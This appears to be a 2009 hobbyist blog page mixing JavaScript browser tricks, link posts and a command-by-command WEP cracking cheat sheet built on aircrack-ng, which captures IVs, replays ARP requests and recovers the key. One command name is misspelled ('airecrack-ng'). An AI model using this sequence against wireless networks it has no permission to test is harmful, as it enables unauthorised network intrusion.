Sunday, February 1, 2009

Java Script Hacks

Here are a couple different java script hacks. All you need to do is paste the code into your url bar and press Enter to run it.

Display when web page was last updated:

j
avascript:alert(document.lastModified)

Edit any website:

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

Friday, January 30, 2009

Mini netbook

Way way better then the netbooks.

http://jledger.proboards19.com/index.cgi?board=dtvhacking&action=display&thread=1645

MAC address changer

Sweet mac address changer for windows command line.

Perfect for adding to a batch script that runs on start up. ;)

http://devices.natetrue.com/macshift/

Sunday, January 18, 2009

who knew black computers were faster ?!?

IT'S OFFICIAL

http://www.dansdata.com/black.htm

Fire Good

Fireaddons for Firefox are very useful tools.

http://www.fireaddons.com/iamchosen/

Free is good

Signed up to get a free usb drive today at

http://www.usbforfree.com/index.html

I will let you know if or when it arrives.

Wednesday, January 14, 2009

WEP cracking cheat sheet

Cracking WEP
------------------------------------------------------
MAC address of wireless card = 11:11:11:11:11:11
BSSID (MAC addr of access point) = 22:22:22:22:22:22
ESSID (wireless network name) = essid
Channel = 9
wireless interface = ath0
-------------------------------------------------------------------------

$airmon-ng stop ath0
$airmon-ng start wifi0 9

#Capturing IV's
$airodump-ng -c 9 --bssid 22:22:22:22:22:22 -w output ath0

#Fake Authentication
$aireplay-ng -1 0 -e essid -a 22:22:22:22:22:22 -h 11:11:11:11:11:11 ath0
or
$aireplay-ng -1 6000 -o 1 -q 10 -e essid -a 22:22:22:22:22:22 -h 11:11:11:11:11:11 ath0

#ARP request replay mode
$aireplay-ng -3 -b 22:22:22:22:22:22 -h 11:11:11:11:11:11 ath0

#Cracking the WEP key
$airecrack-ng -2 -b 22:22:22:22:22:22 output*.cap